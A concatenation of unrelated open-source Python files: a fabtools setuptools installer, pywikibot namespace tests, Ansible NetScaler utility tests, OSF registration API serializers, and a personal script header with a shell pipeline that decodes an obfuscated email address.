if setuptools_version is None:
_install_from_scratch(python_cmd, use_sudo)
else:
if distribute_version is None:
_upgrade_from_setuptools(python_cmd, use_sudo)
else:
_upgrade_from_distribute(python_cmd, use_sudo)
def _install_from_scratch(python_cmd, use_sudo):
"""
Install setuptools from scratch using installer
"""
with cd("/tmp"):
download(EZ_SETUP_URL)
command = '%(python_cmd)s ez_setup.py' % locals()
if use_sudo:
run_as_root(command)
else:
run(command)
run('rm -f ez_setup.py')
def _upgrade_from_setuptools(python_cmd, use_sudo):
"""
Upgrading from setuptools 0.6 to 0.7+ is supported
"""
_easy_install(['-U', 'setuptools'], python_cmd, use_sudo)
def _upgrade_from_distribute(python_cmd, use_sudo):
"""
Upgrading from distribute 0.6 to setuptools 0.7+ directly is not
supported. We need to upgrade distribute to version 0.7, which is
a dummy package acting as a wrapper to install setuptools 0.7+.
"""
_easy_install(['-U', 'distribute'], python_cmd, use_sudo)
def install(packages, upgrade=False, use_sudo=False, python_cmd='python'):
"""
Install Python packages with ``easy_install``.
Examples::
import fabtools
# Install a single package
fabtools.python_setuptools.install('package', use_sudo=True)
# Install a list of packages
fabtools.python_setuptools.install(['pkg1', 'pkg2'], use_sudo=True)
.. note:: most of the time, you'll want to use
:py:func:`fabtools.python.install()` instead,
which uses ``pip`` to install packages.
"""
argv = []
if upgrade:
argv.append("-U")
if isinstance(packages, basestring):
argv.append(packages)
else:
argv.extend(packages)
_easy_install(argv, python_cmd, use_sudo)
def _easy_install(argv, python_cmd, use_sudo):
"""
Install packages using easy_install
We don't know if the easy_install command in the path will be the
right one, so we use the setuptools entry point to call the script's
main function ourselves.
"""
command = """python -c "\
from pkg_resources import load_entry_point;\
ez = load_entry_point('setuptools', 'console_scripts', 'easy_install');\
ez(argv=%(argv)r)\
""" % locals()
if use_sudo:
run_as_root(command)
else:
run(command)
|
happy5214/pywikibot-core
|
refs/heads/master
|
tests/namespace_tests.py
|
5
|
# -*- coding: utf-8 -*-
"""Tests for the Namespace class."""
#
# (C) Pywikibot team, 2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
from collections import Iterable
from pywikibot.site import Namespace, NamespacesDict
from pywikibot.tools import (
PY2,
StringTypes as basestring,
UnicodeType as unicode,
)
from tests.aspects import unittest, TestCase, AutoDeprecationTestCase
# Default namespaces which should work in any MW wiki
_base_builtin_ns = {
'Media': -2,
'Special': -1,
'': 0,
'Talk': 1,
'User': 2,
'User talk': 3,
'Project': 4,
'Project talk': 5,
'MediaWiki': 8,
'MediaWiki talk': 9,
'Template': 10,
'Template talk': 11,
'Help': 12,
'Help talk': 13,
'Category': 14,
'Category talk': 15,
}
image_builtin_ns = dict(_base_builtin_ns)
image_builtin_ns['Image'] = 6
image_builtin_ns['Image talk'] = 7
file_builtin_ns = dict(_base_builtin_ns)
file_builtin_ns['File'] = 6
file_builtin_ns['File talk'] = 7
builtin_ns = dict(list(image_builtin_ns.items()) + list(file_builtin_ns.items()))
def builtin_NamespacesDict():
"""Return a NamespacesDict of the builtin namespaces."""
return NamespacesDict(Namespace.builtin_namespaces())
class TestNamespaceObject(TestCase):
"""Test cases for Namespace class."""
net = False
def testNamespaceTypes(self):
"""Test cases for methods manipulating Namespace names."""
ns = Namespace.builtin_namespaces(use_image_name=False)
self.assertIsInstance(ns, dict)
self.assertTrue(all(x in ns for x in range(0, 16)))
self.assertTrue(all(isinstance(key, int)
for key in ns))
self.assertTrue(all(isinstance(val, Iterable)
for val in ns.values()))
self.assertTrue(all(isinstance(name, basestring)
for val in ns.values()
for name in val))
# Use a namespace object as a dict key
self.assertEqual(ns[ns[6]], ns[6])
def testNamespaceConstructor(self):
"""Test Namespace constructor."""
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertEqual(y.id, 6)
self.assertEqual(y.custom_name, u'dummy')
self.assertEqual(y.canonical_name, u'File')
self.assertNotEqual(y.custom_name, u'Dummy')
self.assertNotEqual(y.canonical_name, u'file')
self.assertIn(u'Image', y.aliases)
self.assertIn(u'Immagine', y.aliases)
self.assertEqual(len(y), 4)
self.assertEqual(list(y), ['dummy', u'File', u'Image', u'Immagine'])
self.assertEqual(y.case, u'first-letter')
def testNamespaceNameCase(self):
"""Namespace names are always case-insensitive."""
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertIn(u'dummy', y)
self.assertIn(u'Dummy', y)
self.assertIn(u'file', y)
self.assertIn(u'File', y)
self.assertIn(u'image', y)
self.assertIn(u'Image', y)
self.assertIn(u'immagine', y)
self.assertIn(u'Immagine', y)
def testNamespaceToString(self):
"""Test Namespace __str__ and __unicode__."""
ns = Namespace.builtin_namespaces(use_image_name=False)
self.assertEqual(str(ns[0]), ':')
self.assertEqual(str(ns[1]), 'Talk:')
self.assertEqual(str(ns[6]), ':File:')
self.assertEqual(unicode(ns[0]), u':')
self.assertEqual(unicode(ns[1]), u'Talk:')
self.assertEqual(unicode(ns[6]), u':File:')
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'ملف', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertEqual(str(y), ':File:')
if PY2:
self.assertEqual(unicode(y), u':ملف:')
self.assertEqual(y.canonical_prefix(), ':File:')
self.assertEqual(y.custom_prefix(), u':ملف:')
def testNamespaceCompare(self):
"""Test Namespace comparisons."""
a = Namespace(id=0, canonical_name=u'')
self.assertEqual(a, 0)
self.assertEqual(a, '')
self.assertFalse(a < 0)
self.assertFalse(a > 0)
self.assertNotEqual(a, None)
self.assertGreater(a, -1)
x = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
y = Namespace(id=6, custom_name=u'ملف', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
z = Namespace(id=7, custom_name=u'dummy 7', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
self.assertEqual(x, x)
self.assertEqual(x, y)
self.assertNotEqual(x, a)
self.assertNotEqual(x, z)
self.assertEqual(x, 6)
self.assertEqual(x, u'dummy')
self.assertEqual(x, u'Dummy')
self.assertEqual(x, u'file')
self.assertEqual(x, u'File')
self.assertEqual(x, u':File')
self.assertEqual(x, u':File:')
self.assertEqual(x, u'File:')
self.assertEqual(x, u'image')
self.assertEqual(x, u'Image')
self.assertFalse(x < 6)
self.assertFalse(x > 6)
self.assertEqual(y, u'ملف')
self.assertLess(a, x)
self.assertLess(x, z)
self.assertLessEqual(a, x)
self.assertGreater(x, a)
self.assertGreater(x, 0)
self.assertGreater(z, x)
self.assertGreaterEqual(x, a)
self.assertGreaterEqual(y, x)
self.assertIn(6, [x, y, z])
self.assertNotIn(8, [x, y, z])
def testNamespaceNormalizeName(self):
"""Test Namespace.normalize_name."""
self.assertEqual(Namespace.normalize_name(u'File'), u'File')
self.assertEqual(Namespace.normalize_name(u':File'), u'File')
self.assertEqual(Namespace.normalize_name(u'File:'), u'File')
self.assertEqual(Namespace.normalize_name(u':File:'), u'File')
self.assertEqual(Namespace.normalize_name(u''), u'')
self.assertEqual(Namespace.normalize_name(u':'), False)
self.assertEqual(Namespace.normalize_name(u'::'), False)
self.assertEqual(Namespace.normalize_name(u':::'), False)
self.assertEqual(Namespace.normalize_name(u':File::'), False)
self.assertEqual(Namespace.normalize_name(u'::File:'), False)
self.assertEqual(Namespace.normalize_name(u'::File::'), False)
def test_repr(self):
"""Test Namespace.__repr__."""
a = Namespace(id=0, canonical_name=u'Foo')
s = repr(a)
r = "Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[])" \
% (unicode('Foo'), unicode('Foo'))
self.assertEqual(s, r)
a.defaultcontentmodel = 'bar'
s = repr(a)
r = ('Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[], '
'defaultcontentmodel=%r)' %
(unicode('Foo'), unicode('Foo'), unicode('bar')))
self.assertEqual(s, r)
a.case = 'upper'
s = repr(a)
r = ('Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[], '
'case=%r, defaultcontentmodel=%r)' %
(unicode('Foo'), unicode('Foo'), unicode('upper'), unicode('bar')))
self.assertEqual(s, r)
b = eval(repr(a))
self.assertEqual(a, b)
class TestNamespaceDictDeprecated(AutoDeprecationTestCase):
"""Test static/classmethods in Namespace replaced by NamespacesDict."""
net = False
def test_resolve_equal(self):
"""Test Namespace.resolve success."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
main_ns = namespaces[0]
file_ns = namespaces[6]
special_ns = namespaces[-1]
self.assertEqual(Namespace.resolve([6]), [file_ns])
self.assertEqual(Namespace.resolve(['File']), [file_ns])
self.assertEqual(Namespace.resolve(['6']), [file_ns])
self.assertEqual(Namespace.resolve([file_ns]), [file_ns])
self.assertEqual(Namespace.resolve([file_ns, special_ns]),
[file_ns, special_ns])
self.assertEqual(Namespace.resolve([file_ns, file_ns]),
[file_ns, file_ns])
self.assertEqual(Namespace.resolve(6), [file_ns])
self.assertEqual(Namespace.resolve('File'), [file_ns])
self.assertEqual(Namespace.resolve('6'), [file_ns])
self.assertEqual(Namespace.resolve(file_ns), [file_ns])
self.assertEqual(Namespace.resolve(0), [main_ns])
self.assertEqual(Namespace.resolve('0'), [main_ns])
self.assertEqual(Namespace.resolve(-1), [special_ns])
self.assertEqual(Namespace.resolve('-1'), [special_ns])
self.assertEqual(Namespace.resolve('File:'), [file_ns])
self.assertEqual(Namespace.resolve(':File'), [file_ns])
self.assertEqual(Namespace.resolve(':File:'), [file_ns])
self.assertEqual(Namespace.resolve('Image:'), [file_ns])
self.assertEqual(Namespace.resolve(':Image'), [file_ns])
self.assertEqual(Namespace.resolve(':Image:'), [file_ns])
def test_resolve_exceptions(self):
"""Test Namespace.resolve failure."""
self.assertRaises(TypeError, Namespace.resolve, [True])
self.assertRaises(TypeError, Namespace.resolve, [False])
self.assertRaises(TypeError, Namespace.resolve, [None])
self.assertRaises(TypeError, Namespace.resolve, True)
self.assertRaises(TypeError, Namespace.resolve, False)
self.assertRaises(TypeError, Namespace.resolve, None)
self.assertRaises(KeyError, Namespace.resolve, -10)
self.assertRaises(KeyError, Namespace.resolve, '-10')
self.assertRaises(KeyError, Namespace.resolve, 'foo')
self.assertRaises(KeyError, Namespace.resolve, ['foo'])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: -10',
Namespace.resolve, [-10, 0])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: foo',
Namespace.resolve, [0, 'foo'])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: -10,-11',
Namespace.resolve, [-10, 0, -11])
def test_lookup_name(self):
"""Test Namespace.lookup_name."""
file_nses = Namespace.builtin_namespaces(use_image_name=False)
image_nses = Namespace.builtin_namespaces(use_image_name=True)
for name, ns_id in builtin_ns.items():
file_ns = Namespace.lookup_name(name, file_nses)
self.assertIsInstance(file_ns, Namespace)
image_ns = Namespace.lookup_name(name, image_nses)
self.assertIsInstance(image_ns, Namespace)
with self.disable_assert_capture():
self.assertEqual(file_ns.id, ns_id)
self.assertEqual(image_ns.id, ns_id)
class TestNamespaceCollections(TestCase):
"""Test how Namespace interact when in collections."""
net = False
def test_set(self):
"""Test converting sequence of Namespace to a set."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
self.assertTrue(all(isinstance(x, int) for x in namespaces))
self.assertTrue(all(isinstance(x, int) for x in namespaces.keys()))
self.assertTrue(all(isinstance(x, Namespace)
for x in namespaces.values()))
namespaces_set = set(namespaces)
self.assertEqual(len(namespaces), len(namespaces_set))
self.assertTrue(all(isinstance(x, int) for x in namespaces_set))
def test_set_minus(self):
"""Test performing set minus operation on set of Namespace objects."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
excluded_namespaces = set([-1, -2])
positive_namespaces = set(namespaces) - excluded_namespaces
self.assertEqual(len(namespaces),
len(positive_namespaces) + len(excluded_namespaces))
class TestNamespacesDictLookupName(TestCase):
"""Test NamespacesDict.lookup_name and lookup_normalized_name."""
net = False
def test_lookup_name(self):
"""Test lookup_name."""
namespaces = builtin_NamespacesDict()
self.assertIs(namespaces.lookup_name('project'), namespaces[4])
self.assertIs(namespaces.lookup_name('PROJECT'), namespaces[4])
self.assertIs(namespaces.lookup_name('Project'), namespaces[4])
self.assertIs(namespaces.lookup_name('Project:'), namespaces[4])
def test_lookup_normalized_name(self):
"""Test lookup_normalized_name."""
namespaces = builtin_NamespacesDict()
self.assertIs(namespaces.lookup_normalized_name('project'),
namespaces[4])
self.assertIsNone(namespaces.lookup_normalized_name('PROJECT'))
self.assertIsNone(namespaces.lookup_normalized_name('Project'))
self.assertIsNone(namespaces.lookup_normalized_name('Project:'))
class TestNamespacesDictGetItem(TestCase):
"""Test NamespacesDict.__getitem__."""
net = False
def test_ids(self):
"""Test lookup by canonical namespace id."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace.id])
def test_namespace(self):
"""Test lookup by Namespace object."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace])
def test_invalid_id(self):
"""Test lookup by invalid id."""
namespaces = builtin_NamespacesDict()
lower = min(namespaces.keys()) - 1
higher = max(namespaces.keys()) + 1
self.assertRaises(KeyError, namespaces.__getitem__, lower)
self.assertRaises(KeyError, namespaces.__getitem__, higher)
def test_canonical_name(self):
"""Test lookup by canonical namespace name."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace.canonical_name])
self.assertEqual(namespace,
namespaces[namespace.canonical_name.upper()])
def test_canonical_attr(self):
"""Test attribute lookup by canonical namespace name."""
namespaces = builtin_NamespacesDict()
self.assertEqual(namespaces[0], namespaces.MAIN)
self.assertEqual(namespaces[1], namespaces.TALK)
for namespace in namespaces.values():
if namespace.id == 0:
continue
attr = namespace.canonical_name.upper()
self.assertEqual(namespace, getattr(namespaces, attr))
def test_all(self):
"""Test lookup by any namespace name."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
for name in namespace:
self.assertEqual(namespace, namespaces[name.upper()])
def test_invalid_name(self):
"""Test lookup by invalid name."""
namespaces = builtin_NamespacesDict()
self.assertRaises(KeyError, namespaces.__getitem__, 'FOO')
# '|' is not permitted in namespace names
self.assertRaises(KeyError, namespaces.__getitem__, '|')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
1844144/django-blog-zinnia
|
refs/heads/deep
|
zinnia/tests/implementations/__init__.py
|
17
|
"""
Implementation components at the project level
needed for testing Zinnia.
"""
|
skg-net/ansible
|
refs/heads/devel
|
test/units/modules/network/netscaler/test_netscaler_module_utils.py
|
56
|
# Copyright (c) 2017 Citrix Systems
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import Mock
from ansible.module_utils.network.netscaler.netscaler import ConfigProxy, get_immutables_intersection, ensure_feature_is_enabled, log, loglines
class TestNetscalerConfigProxy(unittest.TestCase):
def test_values_copied_to_actual(self):
actual = Mock()
client = Mock()
values = {
'some_key': 'some_value',
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['some_key']
)
self.assertEqual(actual.some_key, values['some_key'], msg='Failed to pass correct value from values dict')
def test_none_values_not_copied_to_actual(self):
actual = Mock()
client = Mock()
actual.key_for_none = 'initial'
print('actual %s' % actual.key_for_none)
values = {
'key_for_none': None,
}
print('value %s' % actual.key_for_none)
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['key_for_none']
)
self.assertEqual(actual.key_for_none, 'initial')
def test_missing_from_values_dict_not_copied_to_actual(self):
actual = Mock()
client = Mock()
values = {
'irrelevant_key': 'irrelevant_value',
}
print('value %s' % actual.key_for_none)
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['key_for_none']
)
print('none %s' % getattr(actual, 'key_for_none'))
self.assertIsInstance(actual.key_for_none, Mock)
def test_bool_yes_no_transform(self):
actual = Mock()
client = Mock()
values = {
'yes_key': True,
'no_key': False,
}
transforms = {
'yes_key': ['bool_yes_no'],
'no_key': ['bool_yes_no']
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['yes_key', 'no_key'],
transforms=transforms,
)
actual_values = [actual.yes_key, actual.no_key]
self.assertListEqual(actual_values, ['YES', 'NO'])
def test_bool_on_off_transform(self):
actual = Mock()
client = Mock()
values = {
'on_key': True,
'off_key': False,
}
transforms = {
'on_key': ['bool_on_off'],
'off_key': ['bool_on_off']
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['on_key', 'off_key'],
transforms=transforms,
)
actual_values = [actual.on_key, actual.off_key]
self.assertListEqual(actual_values, ['ON', 'OFF'])
def test_callable_transform(self):
actual = Mock()
client = Mock()
values = {
'transform_key': 'hello',
'transform_chain': 'hello',
}
transforms = {
'transform_key': [lambda v: v.upper()],
'transform_chain': [lambda v: v.upper(), lambda v: v[:4]]
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['transform_key', 'transform_chain'],
transforms=transforms,
)
actual_values = [actual.transform_key, actual.transform_chain]
self.assertListEqual(actual_values, ['HELLO', 'HELL'])
class TestNetscalerModuleUtils(unittest.TestCase):
def test_immutables_intersection(self):
actual = Mock()
client = Mock()
values = {
'mutable_key': 'some value',
'immutable_key': 'some other value',
}
proxy = ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['mutable_key', 'immutable_key'],
immutable_attrs=['immutable_key'],
)
keys_to_check = ['mutable_key', 'immutable_key', 'non_existant_key']
result = get_immutables_intersection(proxy, keys_to_check)
self.assertListEqual(result, ['immutable_key'])
def test_ensure_feature_is_enabled(self):
client = Mock()
attrs = {'get_enabled_features.return_value': ['GSLB']}
client.configure_mock(**attrs)
ensure_feature_is_enabled(client, 'GSLB')
ensure_feature_is_enabled(client, 'LB')
client.enable_features.assert_called_once_with('LB')
def test_log_function(self):
messages = [
'First message',
'Second message',
]
log(messages[0])
log(messages[1])
self.assertListEqual(messages, loglines, msg='Log messages not recorded correctly')
|
abought/osf.io
|
refs/heads/develop
|
api/registrations/serializers.py
|
2
|
import json
from modularodm.exceptions import ValidationValueError
from rest_framework import serializers as ser
from rest_framework import exceptions
from api.base.utils import absolute_reverse, get_user_auth
from website.project.metadata.utils import is_prereg_admin_not_project_admin
from website.exceptions import NodeStateError
from website.project.model import NodeUpdateError
from api.files.serializers import FileSerializer
from api.nodes.serializers import NodeSerializer, NodeProviderSerializer
from api.nodes.serializers import NodeLinksSerializer, NodeLicenseSerializer
from api.nodes.serializers import NodeContributorsSerializer, NodeTagField
from api.base.serializers import (IDField, RelationshipField, LinksField, HideIfWithdrawal,
FileCommentRelationshipField, NodeFileHyperLinkField, HideIfRegistration, JSONAPIListField)
class BaseRegistrationSerializer(NodeSerializer):
title = ser.CharField(read_only=True)
description = ser.CharField(read_only=True)
category_choices = NodeSerializer.category_choices
category_choices_string = NodeSerializer.category_choices_string
category = HideIfWithdrawal(ser.ChoiceField(read_only=True, choices=category_choices, help_text='Choices: ' + category_choices_string))
date_modified = HideIfWithdrawal(ser.DateTimeField(read_only=True))
fork = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_fork'))
collection = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_collection'))
node_license = HideIfWithdrawal(NodeLicenseSerializer(read_only=True))
tags = HideIfWithdrawal(JSONAPIListField(child=NodeTagField(), read_only=True))
public = HideIfWithdrawal(ser.BooleanField(source='is_public', required=False,
help_text='Nodes that are made public will give read-only access '
'to everyone. Private nodes require explicit read '
'permission. Write and admin access are the same for '
'public and private nodes. Administrators on a parent '
'node have implicit read permissions for all child nodes'))
current_user_permissions = HideIfWithdrawal(ser.SerializerMethodField(help_text='List of strings representing the permissions '
'for the current user on this node.'))
pending_embargo_approval = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_pending_embargo',
help_text='The associated Embargo is awaiting approval by project admins.'))
pending_registration_approval = HideIfWithdrawal(ser.BooleanField(source='is_pending_registration', read_only=True,
help_text='The associated RegistrationApproval is awaiting approval by project admins.'))
pending_withdrawal = HideIfWithdrawal(ser.BooleanField(source='is_pending_retraction', read_only=True,
help_text='The registration is awaiting withdrawal approval by project admins.'))
withdrawn = ser.BooleanField(source='is_retracted', read_only=True,
help_text='The registration has been withdrawn.')
date_registered = ser.DateTimeField(source='registered_date', read_only=True, help_text='Date time of registration.')
embargo_end_date = HideIfWithdrawal(ser.SerializerMethodField(help_text='When the embargo on this registration will be lifted.'))
withdrawal_justification = ser.CharField(source='retraction.justification', read_only=True)
template_from = HideIfWithdrawal(ser.CharField(read_only=True, allow_blank=False, allow_null=False,
help_text='Specify a node id for a node you would like to use as a template for the '
'new node. Templating is like forking, except that you do not copy the '
'files, only the project structure. Some information is changed on the top '
'level project by submitting the appropriate fields in the request body, '
'and some information will not change. By default, the description will '
'be cleared and the project will be made private.'))
registration_supplement = ser.SerializerMethodField()
registered_meta = HideIfWithdrawal(ser.SerializerMethodField(
help_text='A dictionary with supplemental registration questions and responses.'))
registered_by = HideIfWithdrawal(RelationshipField(
related_view='users:user-detail',
related_view_kwargs={'user_id': '<registered_user_id>'}
))
registered_from = HideIfWithdrawal(RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<registered_from_id>'}
))
children = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-children',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_node_count'},
))
comments = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-comments',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'unread': 'get_unread_comments_count'},
filter={'target': '<pk>'}
))
contributors = RelationshipField(
related_view='registrations:registration-contributors',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_contrib_count'}
)
files = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-providers',
related_view_kwargs={'node_id': '<pk>'}
))
wikis = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-wikis',
related_view_kwargs={'node_id': '<pk>'},
))
forked_from = HideIfWithdrawal(RelationshipField(
related_view=lambda n: 'registrations:registration-detail' if getattr(n, 'is_registration', False) else 'nodes:node-detail',
related_view_kwargs={'node_id': '<forked_from_id>'}
))
license = HideIfWithdrawal(RelationshipField(
related_view='licenses:license-detail',
related_view_kwargs={'license_id': '<node_license.node_license._id>'},
))
logs = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-logs',
related_view_kwargs={'node_id': '<pk>'},
))
forks = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-forks',
related_view_kwargs={'node_id': '<pk>'}
))
node_links = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-pointers',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_pointers_count'}
))
parent = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-detail',
related_view_kwargs={'node_id': '<parent_node._id>'},
filter_key='parent_node'
))
root = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-detail',
related_view_kwargs={'node_id': '<root._id>'}
))
affiliated_institutions = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-institutions',
related_view_kwargs={'node_id': '<pk>'}
))
registration_schema = RelationshipField(
related_view='metaschemas:metaschema-detail',
related_view_kwargs={'metaschema_id': '<registered_schema_id>'}
)
registrations = HideIfRegistration(RelationshipField(
related_view='nodes:node-registrations',
related_view_kwargs={'node_id': '<pk>'}
))
draft_registrations = HideIfRegistration(RelationshipField(
related_view='nodes:node-draft-registrations',
related_view_kwargs={'node_id': '<pk>'}
))
identifiers = HideIfWithdrawal(RelationshipField(
related_view='registrations:identifier-list',
related_view_kwargs={'node_id': '<pk>'}
))
links = LinksField({'self': 'get_registration_url', 'html': 'get_absolute_html_url'})
def get_registration_url(self, obj):
return absolute_reverse('registrations:registration-detail', kwargs={'node_id': obj._id})
def get_absolute_url(self, obj):
return self.get_registration_url(obj)
def create(self, validated_data):
auth = get_user_auth(self.context['request'])
draft = validated_data.pop('draft')
registration_choice = validated_data.pop('registration_choice', 'immediate')
embargo_lifted = validated_data.pop('lift_embargo', None)
reviewer = is_prereg_admin_not_project_admin(self.context['request'], draft)
try:
draft.validate_metadata(metadata=draft.registration_metadata, reviewer=reviewer, required_fields=True)
except ValidationValueError as e:
raise exceptions.ValidationError(e.message)
registration = draft.register(auth, save=True)
if registration_choice == 'embargo':
if not embargo_lifted:
raise exceptions.ValidationError('lift_embargo must be specified.')
embargo_end_date = embargo_lifted.replace(tzinfo=None)
try:
registration.embargo_registration(auth.user, embargo_end_date)
except ValidationValueError as err:
raise exceptions.ValidationError(err.message)
else:
try:
registration.require_approval(auth.user)
except NodeStateError as err:
raise exceptions.ValidationError(err)
registration.save()
return registration
def get_registered_meta(self, obj):
if obj.registered_meta:
meta_values = obj.registered_meta.values()[0]
try:
return json.loads(meta_values)
except TypeError:
return meta_values
except ValueError:
return meta_values
return None
def get_embargo_end_date(self, obj):
if obj.embargo_end_date:
return obj.embargo_end_date
return None
def get_registration_supplement(self, obj):
if obj.registered_schema:
schema = obj.registered_schema[0]
if schema is None:
return None
return schema.name
return None
def get_current_user_permissions(self, obj):
return NodeSerializer.get_current_user_permissions(self, obj)
def update(self, registration, validated_data):
is_public = validated_data.get('is_public', False)
if is_public:
try:
registration.update(validated_data)
except NodeUpdateError as err:
raise exceptions.ValidationError(err.reason)
else:
raise exceptions.ValidationError('Registrations can only be turned from private to public.')
return registration
class Meta:
type_ = 'registrations'
class RegistrationSerializer(BaseRegistrationSerializer):
"""
Overrides BaseRegistrationSerializer to add draft_registration, registration_choice, and lift_embargo fields
"""
draft_registration = ser.CharField(write_only=True)
registration_choice = ser.ChoiceField(write_only=True, choices=['immediate', 'embargo'])
lift_embargo = ser.DateTimeField(write_only=True, default=None, input_formats=['%Y-%m-%dT%H:%M:%S'])
class RegistrationDetailSerializer(BaseRegistrationSerializer):
"""
Overrides BaseRegistrationSerializer to make id required.
"""
id = IDField(source='_id', required=True)
class RegistrationNodeLinksSerializer(NodeLinksSerializer):
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'registrations:registration-pointer-detail',
kwargs={
'node_id': node_id,
'node_link_id': obj._id
}
)
class RegistrationContributorsSerializer(NodeContributorsSerializer):
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'registrations:registration-contributor-detail',
kwargs={
'node_id': node_id,
'user_id': obj._id
}
)
class RegistrationFileSerializer(FileSerializer):
files = NodeFileHyperLinkField(
related_view='registrations:registration-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder'
)
comments = FileCommentRelationshipField(related_view='registrations:registration-comments',
related_view_kwargs={'node_id': '<node._id>'},
related_meta={'unread': 'get_unread_comments_count'},
filter={'target': 'get_file_guid'})
class RegistrationProviderSerializer(NodeProviderSerializer):
"""
Overrides NodeProviderSerializer to lead to correct registration file links
"""
files = NodeFileHyperLinkField(
related_view='registrations:registration-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder',
never_embed=True
)
|
eda-globetrotter/Calabria-Digital-Bio
|
refs/heads/master
|
reads-dna-seq/try_concepts.py
|
1
|
#!/usr/bin/python
"""
This Python script is written by Zhiyang Ong to try
different concepts in Python.
Synopsis:
Try different concepts in Python.
This script can be executed as follows:
./try_concepts.py [input arguments as necessary]
Parameters:
[input arguments]: ???
"""
# The MIT License (MIT)
# Copyright (c) <2014> <Zhiyang Ong>
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Email address: echo "cukj -wb- 23wU4X5M589 TROJANS cqkH wiuz2y 0f Mw Stanford" | awk '{ sub("23wU4X5M589","F.d_c_b. ") sub("Stanford","d0mA1n"); print $5, $2, $8; for (i=1; i<=1; i++) print "6\b"; print $9, $7, $6 }' | sed y/kqcbuHwM62z/gnotrzadqmC/ | tr 'q' ' ' | tr -d [:cntrl:] | tr -d 'ir' | tr y "\n" Che cosa significa?
###############################################################
